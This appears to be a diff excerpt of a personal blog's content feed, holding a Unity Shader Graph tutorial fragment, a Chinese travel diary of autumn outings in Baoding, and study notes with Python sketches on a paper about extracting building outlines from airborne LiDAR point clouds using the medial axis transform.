    ​ Volume 调整 Bloom 的 Tint 和 Intensity。

    png

    ​ 制作线框消失的效果,将顶点低于 Threshold 的隐去。

    png

    ​ 预览效果。

    png

    ​ 用 Time 代替 Threshold,由于 Time 是一个随时间不断增加的数,对其进行 Modulo 求余就可以实现周期一样的效果。
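The same trick in a tiny C++ sketch (the period is a demo value): fmod turns an ever-growing time into a repeating ramp, which is what drives the looping effect:

#include <cmath>
#include <iostream>

int main()
{
    // Time keeps growing, but fmod(time, period) is a repeating 0..period ramp
    float period = 2.0f;
    for (float time = 0.0f; time < 6.0f; time += 1.5f)
        std::cout << time << " -> " << std::fmod(time, period) << std::endl;
    return 0;
}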

    09. Shader 帧动画

    png

    ​ 使用 Shader Graph 来实现用一张 UV 贴图的帧动画。

    png

    ​ 使用 Tiling And Offset 将 UV 贴图裁切。

    png

    ​ 一阵数学运算使得可以根据坐标来裁切 UV 贴图。

    png

    ​ 使用 Time 使得自动播放 UV 动画。

    png

    ​ 全家福。

    ]]>
    @@ -4499,7 +4499,7 @@ /posts/Diary-3-%E5%87%BA%E6%B8%B8/ - 前言

    jpg

    梧桐与银杏

    ​ 按照去年所观察的现象,大概过两周银杏就开始大幅度变黄,真是太棒了!

    ​ 科研喜闻乐见地遇见了瓶颈,有点开摆了……


    ​ 保定气候播报:

    # y 轴数据(假设为温度和 PM 值)
    y1 = [11, 12, 8, 12, 10, 10, 9, 8, 7, 9, 11, 6, 6, 8] # 当日最低温
    y2 = [25, 26, 25, 21, 22, 24, 23, 24, 23, 24, 23, 23, 25, 24] # 当日最高温
    y3 = [59, 74, 49, 24, 64, 54, 83, 39, 29, 77, 143, 165, 67, 53] # 当日 PM 值

    png

    ​ 别看某些天最低气温特别低,室内依然热腾腾,还是得穿短袖。

    正文

    10.2

    png

    雄安

    10.5

    11:01 鸭子

    jpg

    嘎嘎嘎

    ​ 图书馆门口悠闲的鸭子。

    20:19 和美保定

    jpg

    和和与美美

    ​保定文旅吉祥物“和和”“美美”,是在“和美保定”品牌基础上设计衍生出的保定文旅专属形象,内涵寓意丰富、设计灵动鲜活,展现了保定独具魅力的文化旅游新形象。

    ​ 大晚上又跑去东湖公园散步。在暑假的这两个月里,保定政府似乎努力开发了许多保定的旅游资源。

    20:20 关汉卿大剧院

    jpg

    金灿灿

    ​ 关汉卿大剧院金碧辉煌。

    20:31 未来石、关汉卿大剧院、农行大楼

    jpg

    三大件

    ​ 保定三大法宝。

    20:44 某口号

    jpg

    团结 有爱 包容 文明

    ​ 平面图绘制的从左到右依次是军校广场、总督署广场、关汉卿大剧院、古莲花池。

    10.6

    ​ 法定假期的最后一天,凡哥又想要出去玩。我极力推荐满城汉墓,但是凡哥认为这就是个烂怂墓没啥好去的,于是改去了新修的保定宴博物馆。

    ​ 但是似乎有点远啊,10 km 坐公交要将近两个小时凡哥不能接受,打车要 50 块钱我不能接受,最后决定骑共享单车好了。

    11:43 数据湾

    jpg

    数据湾

​ 途经保定的高新区,可以看到小米京东之类的,但是在网上似乎没看到什么工作机会。

    ​ 上网查了下保定的高新区从 1992 年就开始规划,至今也 30 多年了。

    12:27 盖盖盖

    jpg

    盖盖盖

    ​ 高新区还在加盖的写字楼。

    ​ 骑车也不知道骑了多久,反正我是蛮累的。

    12:33 保定宴大楼

    jpg

    大门口

    ​ 终于到了!

    12:46 仿古建筑

    jpg

    仿古建筑

​ 刚进门还修得蛮漂亮的,但是里面人挤人……

    ​ 除了刚进门的一些仿古建筑外,没有让我感受到“保定宴”的氛围,依旧是走的网红小吃路线,没看到什么保定特色美食。为什么要在这里卖长沙大香肠呢?而且还卖得死贵。

    12:53 孙中山?

    jpg

    总统府?

    ​ 不知道保定在民国时期有什么故事?感觉没啥故事硬蹭……

    12:53 电影海报

    jpg

    电影海报

    ​ 80-90 年代的电影海报?

    12:55 民国招牌

    jpg

    民国风

    ​ 依旧是民国风情的招牌。

    12:56 假木牌

    jpg

    假木牌

    ​ 于是乎逛了一圈,实在觉得无趣,配不上它所宣传的效果,果然保定这个地方就是个美食荒漠……最后还是在对面的汇博解决的午饭……花了 30 元吃了份羊肉泡馍。

    ​ 由于阳哥把自己的自行车骑过来了,只好再硬着头皮陪阳哥骑回学校……

    14:53 狼牙山五壮士纪念碑

    jpg

    双拥广场

    ​狼牙山五壮士(1941),八路军晋察冀军区第 1 军分区 1 团 7 连 6 班,为在河北省保定市易县狼牙山战斗中英勇抗击日军和伪满洲国军的八路军 5 位英雄,他们是马宝玉、葛振林、宋学义、胡德林、胡福才,他们用生命和鲜血谱写出一首气吞山河的壮丽诗篇。

    10.13

    07:05 日出

    jpg

    太阳东升

    ​ 雾霾一大好处——看日出的时候不会刺眼。

    10:50 中国古动物博物馆

    jpg

    能见度极低的中国古动物博物馆

    ​ 国庆 8 天长假后就是 7 天连上班,天天泡电脑前人确实有点吃不消了……于是决定偷跑出去吸雾霾了。打算骑去淮军公所,再不去免费开放的时间就过去了!

​ 途经中国古动物博物馆,一个国家级的博物馆一直迟迟不开放……

    11:07 京门虎踞

    jpg

    京门虎踞

    ​ 听说保定人很恨北京人,但是他们还是得把靠近北京当作自己的招牌。

    11:21 淮军公所

    jpg

    中国古戏楼博物馆

    ​古戏楼,是中国古代戏曲的表演场所,是中国古代剧场的组成部分。中国剧场历史悠久,形式多样,数量庞大,分布广泛。从先秦时期的摆地为场到汉唐时期的亭台楼阁,从宋元时期的专门性剧场瓦舍勾栏,再到清代的神庙、宗祠、宫廷、茶园戏楼,不断细分的演出场地形态在物换星移中记录着中国传统戏曲的兴盛,也见证着戏台上的人间百态。中华戏曲源远流长,从原始祭祀舞蹈到标志戏曲形成的南戏,繁荣的北杂剧、明清传奇,再到剧种繁多的地方戏,共同聚合成百花齐放的中华戏曲大观园。建于光绪年间的保定淮军昭忠祠暨公所戏楼是古代建筑艺术与戏曲表演艺术的有机结合,是清代会馆戏楼的典范。
    ​本陈列由古代戏楼、公所戏楼、中国戏曲三个部分组成,勾勒出中国古戏楼的发展变迁,历史内涵,以及雅俗共赏、博大精深的中国戏曲的历史风姿和丰富内涵。

    ​ 一阵骑终于来到了淮军公所的招牌——中国古戏楼博物馆!

    11:24 敕建李文忠公祠

    jpg

    李文忠和昭忠祠有什么关系?(后注:李鸿章谥号)

    ​淮军公所地处保定古城区西南隅的淮军公所全称“淮军昭忠祠暨公所”,是李鸿章任直隶总督兼北洋大臣后,于光绪十四年至光绪十七年(1888 年—1891 年)经专折奏准,奉诏修建的“淮军昭忠祠”及“公所”(淮军办公驻地)合一的建筑群,占地约 30 亩。此祠是继苏州、无锡、武汉之后为祭奠在战斗中阵亡的淮军将士修建的第四座“昭忠祠”,也是规模最宏大的一座。淮军公所位于保定市环城西路 220 号,是李鸿章为纪念淮军在镇压太平天国和捻军阵亡的“将士”而建的昭忠祠,并兼有安徽会馆之功能。李鸿章死后改为李鸿章祠堂。

    ​ 怪不得是个徽式建筑,但是我感觉还是像北方建筑的风格。

    11:37 望荷亭

    jpg

    望荷亭

    ​ 崭新的望荷亭。

    11:37 荷花

    jpg

    ​ 快到了晚秋,居然还有一种荷花没有完全凋谢。

    11:40 园林

    jpg

    小湖

    ​ 淮军公所的后花园。

    11:44 碑文

    jpg

    石碑

    ​ 如果是真的话,保存得还蛮完好。

    11:45 巷口

    jpg

    小巷

    ​ 感觉有点当年去恭王府的感觉。

    11:48 展览

    png

    保定戏曲

    ​ 博物馆里展示的大都是仿制的物品,不过设计得还是蛮用心的。

    ​保定是国家历史文化名城,是一个孕育、繁衍了多个地方剧种的戏剧之乡。目前近 20 个剧种被列入国家级、省级、市级非物质文化遗产名录,是祖国戏曲长河中特色鲜明的璀璨明珠。
    ​保定戏曲源远流长。金代,建于定兴东林寺的戏楼,元代,以关汉卿为代表的保定籍元杂剧作家群;明代,众多的戏曲乐户,晚清和民国时期,戏曲大融合、大调整及京剧、评剧、豫剧等大剧种的传唱;抗战时期,晋察冀根据地的“大众戏剧”运动;新中国成立后,戏曲的全面改革发展,共同勾勒出保定戏曲的发展轨迹。
    ​保定地方戏曲异彩纷呈。高阳河西村是北方昆曲的诞生地,定兴的祥泰班是河北梆子早期科班之一,在全国具有一定影响的地方剧种保定老调亦生于斯、长于斯;彪炳史册、光耀星空的戏曲名家数不胜数;厚植于民间的自娱自乐戏曲团体更是数以千计,丰厚的戏曲资源彰显着保定的文化底蕴。
    ​本展从保定戏曲的源流,保定老调的魅力,保定地方剧种、唱腔、艺术家等多个维度铺展出“无处不弦歌”的保定戏曲画卷。

    ​ 至于保定戏曲,应该跟京剧大差不差吧。

    11:51 戏楼

    jpg

    戏楼

    ​ 被翻新得蛮气派的戏楼。

    11:56 雕塑

    jpg

    雕塑

    ​ 被翻新得蛮气派的雕塑。

    12:37 保定古玩市场

    ​ 出来了,看着时间还早,打算再去光园转转。结果告诉我还在维修……那就再去曹锟戏楼打个卡好了。

    jpg

    ​ 保定古玩市场,可以进去回收古玩、粮票、钱币之类的。

    12:41 曹锟戏楼

    jpg

    ​关岳行宫俗称“老爷庙”,“曹锟大戏台”,为国内唯一一座同时供奉关羽和岳飞的庙宇。早在元太宗十三年(公元 1241 年)始建的关岳行宫,初时称“武安王庙”。经明、清两代的重修,到民国初年由坐镇保定的大总统曹锟作为直系大本营,将关岳行宫修建的愈增规模。行宫里曹锟亲自撰书的“佛光普照”碑,此碑高约 1.74 公尺 , 宽约 0.75 公尺矗立。这宏伟庑殿,宽敞的戏楼经过多年的尘封,仍然保留,成为国内著名的历史遗迹之一。

    ]]>
    @@ -4650,7 +4650,7 @@ /posts/Paper-Building%20outline%20extraction%20from%20ALS%20point%20clouds%20using%20medial%20axis/ - Resources

    Original paper

    Abstract

    Owing to the variety and complexity of building appearances, automatically extracting and delineating buildings from airborne LiDAR point clouds of urban environments remains a challenging task. The medial axis transform (MAT) can describe an object's geometry and topology, yet it had never been applied to building roof outline extraction. It represents an object's shape through its centerline, or skeletal structure, rather than through its boundary.

    We propose a robust, MAT-based method that detects building corner points and then connects them into building boundary polygons.

    • First, we approximate the 2D MAT of a set of building edge points obtained with the alpha-shape algorithm, deriving a so-called building roof skeleton.
    • Then, we propose a hierarchical corner-aware segmentation that clusters skeleton points according to their properties: the so-called separation angle, the radius of the maximal inscribed circle, and the defining edge-point indices.
    • From each segment, the corner point is estimated by extrapolating the position of a zero-radius inscribed circle from the positions of the skeleton points within the segment.

    The results show that skeletonization is a promising tool for extracting the relevant geometric information of building outlines from far-from-perfect geospatial point cloud data.

    1. Introduction

    Mapping building roof outlines, also known as building footprints, is essential for digital base maps, planning, monitoring, infrastructure management, and sustainable urban design.

    Man-made urban objects (buildings, roads, canals) usually have symmetric shapes with straight lines and sharp corners. Such properties make it possible to extract boundary outlines from ALS point clouds automatically.

    png

    The MAT skeleton (blue lines) intuitively detects the corner points (red dots) located where the skeleton meets the object boundary (black lines).

    The medial axis transform (MAT) is a powerful shape-extraction technique that provides a compact geometric representation while preserving the topological properties of the input shape. The MAT was introduced by Blum for describing biological shapes. Goodness, that dates back to 1967... However, the MAT has one fundamental drawback: its instability under small perturbations of the input shape, which can disturb the topology of the MAT branches.

    Corners are important local features, and knowing their locations minimizes further data processing without losing the characteristic features of the original object's shape. Given an aerial point cloud of an urban area, we propose a method that automatically extracts building outlines from accurate roof corner points based on MAT descriptors.

    With the growing interest in GIS (geographic information system) digital map products, development work on extracting building outlines from various remote-sensing data has intensified as well.

    The various definitions of the MAT, or skeleton, found in the literature correspond to different ways of computing it, leading to different results with different properties. In general, MAT algorithms focus on deriving the geometric location of a surface's centerline or medial axis, the so-called skeletonization. To date, the literature holds many skeletonization methods and their applications to 2D and 3D object description. Existing methods usually fall into four main approaches:

    • methods based on morphological thinning
    • geometry-based methods using the medial axis transform of planar shapes
    • distance-based functions
    • general field functions generated by functions other than distance functions

    Ma et al. estimated 3D medial axis points with a shrinking-ball method based on nearest neighbors and normals; the shrinking-ball algorithm is not only accurate and computationally efficient but is also considered the simplest and fastest surface skeletonization method available.

    3. Methodology

    Our research focuses on adapting the MAT to extract building outlines from the noisy point cloud data used in mapping and spatial modeling. We extend the work on the iterative shrinking-ball algorithm and develop a strategy that exploits skeleton features to extract building outlines accurately.

    The paper also proposes a new skeletal-point segmentation method. The proposed approach reaches the state of the art in handling noisy surface boundaries and reconstructing building outlines, and by optimizing the use of skeleton-based features it needs minimal human interaction. Specifically, the contributions are:

    • Skeleton-derived features are integrated with global features to perform robust skeleton point (MAT) segmentation that handles varying point densities and noise levels.
    • Ordered surface-point indices are combined with skeleton-derived features to detect corner points.
    • Skeleton-derived features are introduced to estimate building corner locations accurately.

    png

    Workflow of the proposed building outline extraction method

    Since this study needs the MAT in 2D, we adopt the 2D shrinking-circle algorithm of Ma et al. The general workflow of the proposed automatic building roof outline extraction consists of the following main steps.

    • (b) Extract building boundary points with the alpha-shape algorithm.
    • (c) Convert the boundary points into their 2D MAT, or skeleton points, with the 2D shrinking-circle algorithm.
    • (d) Apply our MAT segmentation, clustering MAT points by their geometric attributes.
    • (e) Use these segments to detect corner points.
    • (f) Polygonize the detected corner points into a closed 2D polyline.

    png

    A rectangle's skeleton (blue lines) with the corresponding inscribed circles (grey) and medial axis points c (red dots).

    This study uses the extended shrinking-circle method, which implements the denoising heuristics proposed by Peters. We define the skeleton of an object surface $\mathbf S$ as the set of center points $c$ of maximal inscribed circles $B(c,\rho)$ in $\mathbf S$, where $\rho$ denotes the circle radius.

    2D skeleton points are also called medial axis points. Associating the radius function $\rho$ with the set of medial axis points yields the so-called medial axis transform (MAT).

    As shown in the figure above:

    • The medial axis points (red dots) form the MAT skeleton (blue lines) of the rectangular object $\mathbf S$.
    • Every maximal inscribed circle (grey) touches the boundary of $\mathbf S$ (black outline) at no fewer than two points.
    • The center of any circle that is not maximal or not inscribed in $\mathbf S$ (green circle) is ignored and not treated as a medial axis point.

    3.1 Alpha-shape

    Given segmented building points, creating the building outline starts with boundary-point selection by the alpha-shape algorithm introduced by Edelsbrunner. Alpha-shapes are known to preserve the small shape details of a finite point set at the desired level of detail. A 2D alpha-shape is built on the 2D Delaunay triangulation of the input points. The method identifies boundary points according to a parameter $\alpha\ge 0$ that controls the level of detail of the boundary shape. Given a set of points $S$ in the plane and a value of $\alpha$, the algorithm works as follows (a small numerical check of the circle-center formula in step 2a follows at the end of this subsection):

    1. Compute the Delaunay triangulation $DT(S)$ of $S$. All edges of $DT(S)$ are candidate edges of the alpha-shape $S_\alpha$.

    2. For every edge $e$ of $DT(S)$ with endpoints $p$ and $q$:

      a. Find the two circles $B_{pq1}$ and $B_{pq2}$ of radius $\alpha$ whose centers $c_{pq}(1)$ and $c_{pq}(2)$ pass through both endpoints $p$ and $q$ of the edge $e$. The centers are given by:

      $c_{pq}(1,2)=\left(\frac{x_p+x_q}{2}\pm\sqrt{\alpha^2-\left(\frac{\|e\|}{2}\right)^2}\cdot\frac{y_p-y_q}{\|e\|},\ \frac{y_p+y_q}{2}\pm\sqrt{\alpha^2-\left(\frac{\|e\|}{2}\right)^2}\cdot\frac{x_q-x_p}{\|e\|}\right)$

      where $\|e\|$ is the distance between the endpoints $p$ and $q$.

      b. If the interior of at least one of the two circles contains no point of $S$, then $e$ is a valid boundary edge,

      png

      otherwise the edge is discarded.

      png

    3. The union of all valid boundary edges forms the alpha-shape $S_\alpha$.

      png

    The value of $\alpha$ is a real number, $0\le\alpha\le\infty$. As $\alpha$ approaches $0$ the shape may shrink, develop holes, and become disconnected; in the extreme, $\alpha=0$ yields just the data points themselves. As $\alpha$ grows toward infinity, the alpha-shape approaches the convex hull of the point set $S$.

    In our study areas we empirically chose $\alpha$ between $0.3$ and $0.5$.

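    As a quick numerical check of the circle-center formula in step 2a above (a sketch of mine, not code from the paper):

    import numpy as np

    def alpha_circle_centers(p, q, alpha):
        """Centers of the two radius-alpha circles through p and q (step 2a)."""
        p, q = np.asarray(p, float), np.asarray(q, float)
        mid = (p + q) / 2
        L = np.linalg.norm(q - p)
        assert L <= 2 * alpha, "edge longer than the circle diameter"
        h = np.sqrt(alpha**2 - (L / 2) ** 2)           # midpoint-to-center distance
        n = np.array([p[1] - q[1], q[0] - p[0]]) / L   # unit normal to the edge
        return mid + h * n, mid - h * n

    c1, c2 = alpha_circle_centers((0, 0), (1, 0), alpha=1.0)
    print(c1, c2)   # both centers lie at distance 1.0 from p and from q
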
    3.2. The shrinking circle principles

    Given a set of noisy edge points $V$ on a surface $S$ with corresponding normal vectors $N$, the MAT points are defined as the set of centers $c$, with corresponding radii $\rho$, of the maximal inscribed circles $\mathbf B(c,\rho)$ in $S$ tangent to the boundary of $S$. The circle $\mathbf B$ and its center $c$ are called the medial circle and the medial axis point, respectively.

    png

    Principles of the shrinking-circle algorithm applied to a noisy building edge.

    The basic principles of the shrinking-circle method are:

    1. A medial circle touches the surface at two or more points $(p,q)$, where $p,q\in \mathbf S$.

    2. Along the line defined by the normal vector $N_p$ of an edge point $p$, the radius $\rho$ of the circle $\mathbf B_p$ is decreased iteratively until $\mathbf B_p$ touches $\mathbf S$ at some $q\ne p$, the center $c$ staying on the line through $N_p$. The iteration stops when the maximal circle $\mathbf B_p$ is found.

    3. A medial circle is a maximal empty circle, meaning that it contains no surface points.

    3.3. Skeletal points extraction

    To obtain the MAT of a surface $\mathbf S$, the medial axis points $c(p)$ are computed. To that end, the maximal inscribed circle $\mathbf B$ is computed for every sampled point $p\in\mathbf S$ by the following steps (a compact sketch of this loop follows at the end of this subsection):

    1. The initial circle $\mathbf B_{init}$ for $p$ is defined from an initial radius $\rho_{init}$, set large enough, e.g. equal to the maximum distance between two input points.

    2. Given $\rho^k_p$, where $k=1,2,\dots,i$ denotes the $k$-th iteration, the center $c^k_p$ is given by:

      $c^k_p=p-N_p\,\rho^k_p$

    3. Find the surface point $q^k_p\in S$ closest to $c^k_p$ such that $q^k_p\ne p$.

    4. Maximality test for the circle defined by $q^k_p$ and $p$:

      a. If the distance from $c^k_p$ to $q^k_p$ equals the circle radius $\rho^k_p$, the circle $\mathbf B^k_p$ is maximal and $c^k_p$ is a medial axis point.

      b. Otherwise, compute the radius $\rho^{k+1}_p$ of the next, smaller circle with:

      $\rho^{k+1}_p=\frac{d(p,q^k_p)}{2\cos\theta^k_p}$

      where:

      $\cos\theta^k_p=\frac{N_p\cdot(p-q^k_p)}{d(p,q^k_p)}$

    png

    The iteration stops once a medial axis point as described in step (a) is found.

    (a) shows the successive shrinking of circles touching $S$ at point $p$, which in the last iteration yields the medial circle $B^i_p$ and the medial axis point $c^i_p$.

    Given a surface $S$ with a defined interior and exterior, the MAT consists of two parts:

    • an interior part $\mathbf S(N_p)$, made up of the so-called interior medial axis points
    • an exterior part $\mathbf S(-N_p)$, the exterior medial axis points.

    For each $p\in\mathbf S$, the corresponding interior and exterior MAT points are computed by iterating steps 2 to 4, using the inward normal $N_p$ for the interior MAT and the outward normal $-N_p$ for the exterior MAT.

    png

    Figure (b) shows the geometry used to compute the medial axis point $c_p$ and the direction of the normal vector $N_p$ for the interior (black arrows) and exterior (red arrows) circles.

    Noise handling is an important step to overcome the MAT's sensitivity to noisy boundaries. In the presence of small bumps or noise on the input surface, a circle may shrink too far, potentially producing undesired medial axis points. Such over-shrunk circles typically have a small separation angle $\alpha$. The separation angle $\alpha$ (see b) is the angle between the line $p-\mathbf c_p$ (joining the point $p$ and the medial axis point $\mathbf c_p$) and the line $q-\mathbf c_p$ (joining $q$ and $\mathbf c_p$):

    $\cos\alpha=\frac{\overrightarrow{c_pp}\cdot\overrightarrow{c_pq}}{|\overrightarrow{c_pp}|\cdot|\overrightarrow{c_pq}|}$

    During the shrinking procedure above, a good circle is defined as the last circle whose separation angle $\alpha_k$ is larger than a separation-angle threshold $\alpha_{min}$.

    After this step, every medial axis point $\mathbf c_p$ carries a number of attributes. The attributes of each MAT point $\mathbf m_p$ are the medial axis point $c_p$, the radius $\rho$, the separation angle $\alpha$, the indices of the surface points $p$ and $q$, and the normal vector $N_p$ or $-N_p$. In theory, the geometry of $\mathbf S$ can be fully reconstructed from these MAT attributes.

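    A compact sketch of the shrinking-circle loop described above, under simplifying assumptions of mine (the normal is given, and no separation-angle denoising is applied):

    import numpy as np
    from scipy.spatial import cKDTree

    def medial_axis_point(p, n, pts, rho_init, tol=1e-6, max_iter=100):
        """Shrink a circle tangent at p (normal n) until it is maximal."""
        p, n = np.asarray(p, float), np.asarray(n, float)
        pts = np.asarray(pts, float)
        tree = cKDTree(pts)
        rho = rho_init
        for _ in range(max_iter):
            c = p - n * rho                   # center on the line through N_p
            d, idx = tree.query(c, k=2)       # two nearest surface points
            q = pts[idx[1]] if np.allclose(pts[idx[0]], p) else pts[idx[0]]
            if abs(np.linalg.norm(c - q) - rho) < tol:
                return c, rho                 # circle is maximal: a MAT point
            # radius of the circle through p and q that stays tangent at p
            cos_t = np.dot(n, p - q) / np.linalg.norm(p - q)
            rho = np.linalg.norm(p - q) / (2 * cos_t)
        return c, rho
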
    3.4. MAT point segmentation

    The MAT attributes provide rich information that can be used to group MAT points into distinct medial segments, or branches.

    For further use of the MAT, two helpful observations about MAT point connectivity are:

    • MAT points heading toward the same turning point, or corner, are treated as one segment. The finely sampled surface points of the square $\mathbf S$ in the figure below produce fine MAT points, some of which approach a particular turning point. In this sense, every MAT point created from a maximal inscribed circle touching at surface points $p$ and $q$ designates a turning point lying between $p$ and $q$. As shown in (b), the median of the indices of the two surface points $p$, $q$ (red text) is similar to the index of the corner (76).

    png

    • The separation angle $\alpha$ of a MAT point is expected to be close to $90^\circ$. As shown in (c), the MAT points of a rectangle have separation angles distributed around $90^\circ$.

    png

    In practice, surface points are neither perfectly distributed nor noise-free, unlike the regular case shown below. (a) Small perturbations on the surface boundary produce so-called skeleton noise. When detecting shape corners, skeleton noise can induce spurious segments and hence spurious corners.

    png

    Our segmentation criteria rely on the proximity of the turning-point locations of the boundary points. Intuitively, MAT points that lie close to one another and have similar feature values are grouped together. In addition, we expect the radius $\rho$ to vary gradually along a segment branch.

    Based on the observations above, we segment the MAT points with three global thresholds and four MAT-derived features. The global thresholds are independent of the MAT and are defined to improve segmentation accuracy. They are:

    • G.1. A buffer distance $bf$ from the object surface $\mathbf S$. Only MAT points inside the specified buffer are considered for segmentation. This threshold excludes the unusable exterior MAT points produced by maximal circles over two edge points with outward normals; such MAT points are typical noise far away from the surface points.

    • G.2. A minimum number of points per segment, minPts. Any segment with fewer points than the given minPts is treated as segment noise.

    • G.3. A point index interval $\Delta pt$ that sets the minimum distance between two candidate corners: $\Delta pt\ge \frac{l}{r}-2$, where

      • $l$ is the desired minimum edge length,
      • $r$ is the point cloud spacing,
      • and the $\Delta pt$ criterion avoids spurious or extra corners at the defined minimum edge length in the case of short or noisy boundaries.

      For example, given a set of points with a point cloud spacing $r$ of $0.5\,m$ from which building edges of minimum length $l=2.5\,m$ are to be extracted, $\Delta pt$ is set to $3$.

      Suppose point 13 in the figure below had the same medial properties as points 11, 16, and 20. Point 13 would not be treated as a corner, because its index differs from that of point 11 by less than 3.

    png

    Noisy edge points may indicate false corners.

    The custom features derived from the MAT attributes, the MAT-derived features, are:

    • F.1. Only MAT points $\mathbf m_p$ whose separation angle $\alpha$ is close to $90^\circ$ are considered for segmentation. "Close" is specified by a separation-angle difference threshold $\partial \alpha$; MAT points outside the given $\partial \alpha$ are treated as skeleton noise. In other words, a MAT point $\mathbf m_p$ is considered for segmentation if its separation angle $\alpha_p$ lies between $90^\circ-\partial \alpha$ and $90^\circ+\partial \alpha$.

    • F.2. Every edge point $p\in\mathbf S$ is given a unique index. For corner-aware segmentation, MAT points $\mathbf m_p$ with similar features are expected to belong to the same cluster.

      $med_{pq}=p_{idx}+\frac{q_{idx}-p_{idx}}{2}$

      For example, $p_{idx}=13$ and $q_{idx}=19$ in the figure above give $med_{pq}=16$. Different MAT points with similar $med_{pq}$ values are likely to belong to the same MAT segment.

    • F.3. The normal-angle differences $\delta N$ between the normal of a point $p_i$ and the normals of the previous point $p_{i-1}$ and the next point $p_{i+1}$, defined by $|N_{p_i}-N_{p_{i-1}}|$ and $|N_{p_i}-N_{p_{i+1}}|$, respectively.

    • F.4. A maximum median-index difference threshold $\partial K_p$. This feature avoids spurious corners and extra segments caused by perturbations or noise on the surface, particularly near corners.

    Given a set of MAT points $M=\{(c_p,\rho,\alpha,p,q,N)\}$, where each medial axis point $c_p$ carries the attributes $\rho,\alpha,p,q,N$, MAT point segmentation works as follows (a toy sketch of the grouping follows this list):

    1. Use global threshold G.1 to select the MAT points $m_p$ lying within the buffer distance $bf$ of the object surface $\mathbf S$.

    2. Keep only the MAT points $\mathbf m_p$ with an acceptable separation angle $\alpha_p$, as specified by MAT-derived feature F.1.

    3. Compute the median index $med_{pq}$ of the filtered MAT points from step 2 using MAT-derived feature F.2.

    4. Identify all possible candidate corners $K_r$ and put them in a list $K_1, K_2,\dots$

    5. Given a candidate corner $K_r$ from step 4, the algorithm searches for MAT points whose median index is similar to $r_{idx}$.

    6. If $|med_{pq}-r_{idx}|\le\Delta pt$, the MAT point $\mathbf m_p$ is assigned to the medial segment $\mathbf{Mseg}(r)$.

    7. As defined in G.2, any medial segment $\mathbf{Mseg}$ with fewer than $minPts$ member points is removed. This step eliminates the false segments that can form where the edge is defective.

    The medial segments are then used to estimate the actual corners, with one medial segment corresponding to one corner.

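    A toy sketch of the grouping in steps 5-7 (the indices and thresholds are made up):

    def segment_mat_points(med_idx, candidates, delta_pt=3, min_pts=2):
        """Group MAT points (their med_pq indices) around candidate corners."""
        segments = {}
        for r in candidates:
            members = [m for m in med_idx if abs(m - r) <= delta_pt]  # step 6
            if len(members) >= min_pts:                               # step 7 (G.2)
                segments[r] = members
        return segments

    med_idx = [10, 11, 11, 12, 16, 16, 17, 29]  # med_pq of filtered MAT points
    print(segment_mat_points(med_idx, candidates=[11, 16, 29]))
    # {11: [10, 11, 11, 12], 16: [16, 16, 17]} — candidate 29 has too few points
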
    3.5. Corner point estimation

    Instead of designating an edge point as the corner, we estimate the corner location from the positions of the medial axis points and their corresponding radii: the radius $\rho$ of a MAT point's maximal inscribed circle decreases gradually toward the corner.

    3.6. Building outline evaluation metrics

    Two different evaluation metrics are applied to assess how well the proposed workflow meets the requirements.

    Building outline specifications: corner geometric accuracy and corner detection accuracy.

    Positional accuracy, also called geometric or locational accuracy, serves as the primary measure of how well the building polygon is positioned relative to its true location in an absolute georeferenced system.

    We use the RMSE (root mean square error) to measure the mean squared difference between the building corner locations (X and Y coordinates) in the reference and in the result. For all detected building corners, the RMSE of the complete building is computed with respect to the corresponding reference corner locations (a direct transcription into code follows the definitions below).

    $$RMSE_x=\sqrt{\frac{\Sigma(X_{res}-X_{ref})^2}{n}}$$

    $$RMSE_y=\sqrt{\frac{\Sigma(Y_{res}-Y_{ref})^2}{n}}$$

    $$RMSE_r=\sqrt{RMSE_x^2+RMSE_y^2}$$

    $X_{res}$, $Y_{res}=$ coordinates of the resulting corner points

    $X_{ref}$, $Y_{ref}=$ coordinates of the ground-truth corner points

    $n=$ total number of corner points
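
    A direct transcription of the three formulas into Python (toy coordinates of mine; result and reference corners are assumed already matched one-to-one):

    import numpy as np

    def corner_rmse(res, ref):
        """Per-axis and combined RMSE of matched corner coordinates."""
        res, ref = np.asarray(res, float), np.asarray(ref, float)
        rmse_x = np.sqrt(np.mean((res[:, 0] - ref[:, 0]) ** 2))
        rmse_y = np.sqrt(np.mean((res[:, 1] - ref[:, 1]) ** 2))
        return rmse_x, rmse_y, np.hypot(rmse_x, rmse_y)  # hypot = sqrt(x²+y²)

    res = [(0.2, 0.1), (10.1, 0.0), (9.9, 5.2)]    # detected corners
    ref = [(0.0, 0.0), (10.0, 0.0), (10.0, 5.0)]   # ground-truth corners
    print(corner_rmse(res, ref))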

    Because of the complexity of some buildings, not every corner can be detected. We therefore evaluate corner detection accuracy with three retrieval measures: recall, precision, and the F1 score. Precision measures exactness, or fidelity, while recall measures completeness. The F1 score is the weighted average of precision and recall.

    $$Precision=\frac{TP}{TP+FP}$$

    $$Recall=\frac{TP}{TP+FN}$$

    $$F1\text{-}score=\frac{2\cdot Precision\cdot Recall}{Precision+Recall}$$

    png

    In the building polygon in the figure above, the number of correct corners ($TP$) is 4, the number of false corners $FP$ (inside the green ellipse) is 1, and the number of undetected corners, or corners offset by more than one meter, $FN$ (blue circles) is 2.

    This configuration gives $P=0.8$, $R=0.67$, $F1=0.73$ (checked in the quick sketch below).
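
    The arithmetic of this example as a quick sketch:

    def detection_scores(tp, fp, fn):
        """Precision, recall and F1 from corner-detection counts."""
        precision = tp / (tp + fp)
        recall = tp / (tp + fn)
        f1 = 2 * precision * recall / (precision + recall)
        return precision, recall, f1

    print(detection_scores(tp=4, fp=1, fn=2))   # ≈ (0.80, 0.67, 0.73)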

    png

    4. Results and discussions

    4.1. Experiments of the study areas

    The experiments use three study areas with different landscape characteristics and airborne LiDAR point cloud specifications.

    4.2. General overview

    png

    4.3. Comparison analysis

    png

    4.4. Computational and complexity analysis

    Analysis of the time complexity.

    5. Conclusions and recommendations

    The Alpha Shape Algorithm

    import numpy as np
    import matplotlib.pyplot as plt
    from scipy.spatial import Delaunay
    from sklearn.neighbors import KDTree

    def plot_circle(centers, rs, ax):
        N = centers.shape[0]
        for i in range(N):
            theta = np.arange(0, 2 * np.pi, 0.01)
            x = centers[i, 0] + rs[i] * np.cos(theta)
            y = centers[i, 1] + rs[i] * np.sin(theta)
            ax.plot(x, y, 'b-', alpha=0.1)

    The function plot_circle draws circles.

    It takes three arguments: centers, the circle-center coordinates; rs, the circle radii; and ax, a matplotlib Axes object to draw on.

    • The code first reads the shape of the centers array to determine how many circles to draw, then iterates over all centers with a for loop.

    • In each iteration,

      • it first uses np.arange to build a theta array from 0 to 2π with a step of 0.01, representing the circle's angles;
